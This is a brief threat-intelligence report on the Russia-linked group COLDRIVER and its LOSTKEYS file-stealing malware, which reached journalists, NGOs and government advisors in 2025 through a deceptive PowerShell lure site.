COLDRIVER, a Russia-linked threat actor, has initiated espionage operations using a new malware called LOSTKEYS, which is designed to steal sensitive files and system information from targets. This malware has been used in several attacks throughout early 2025, notably against current and former government and military advisors, journalists, and NGOs. LOASTKEYS is a departure from COLDRIVER's historical credential phishing attacks, demonstrating the group's evolution in cyber tactics. Its initial engagement includes a deceptive website with social engineering techniques to coax victims into executing harmful commands with PowerShell.
"LOSTKEYS is capable of stealing files from a hard-coded list of extensions and directories, along with sending system information and running processes to the attacker."
"They are known for stealing credentials and after gaining access to a target's account they exfiltrate emails and steal contact lists from the compromised account."
Collection
[
|
...
]